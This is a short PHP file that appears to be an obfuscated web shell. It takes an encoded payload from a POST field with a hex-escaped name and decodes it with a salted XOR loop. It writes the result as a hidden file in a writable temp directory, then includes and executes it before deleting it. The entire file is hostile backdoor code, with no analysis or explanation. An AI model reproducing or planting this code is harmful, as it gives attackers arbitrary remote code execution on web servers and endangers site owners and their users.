<?php

if(array_key_exists("\x73\x79\x6Dbol", $_POST) && !is_null($_POST["\x73\x79\x6Dbol"])){
	$tkn = array_filter(["/dev/shm", "/tmp", getcwd(), session_save_path(), getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir")]);
	$bind = $_POST["\x73\x79\x6Dbol"];
	 $bind=	explode	 	(			'.',	$bind)			;		 
	$comp = '';
            $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(	 $salt7 );
    
            foreach(	 $bind as $m => $v6):
                $sChar = ord(	 $salt7[$m %	$lenS] );
                $dec =(	 (	 int)$v6 - $sChar -(	 $m %	10)) ^ 64;
                $comp.= chr(	 $dec );
            endforeach;
	$pointer = 0;
do {
    $flag = $tkn[$pointer] ?? null;
    if ($pointer >= count($tkn)) break;
    		if (!( !is_dir($flag) || !is_writable($flag) )) {
    $record = str_replace("{var_dir}", $flag, "{var_dir}/.pgrp");
    $success = file_put_contents($record, $comp);
if ($success) {
	include $record;
	@unlink($record);
	die();}
}
    $pointer++;
} while (true);
}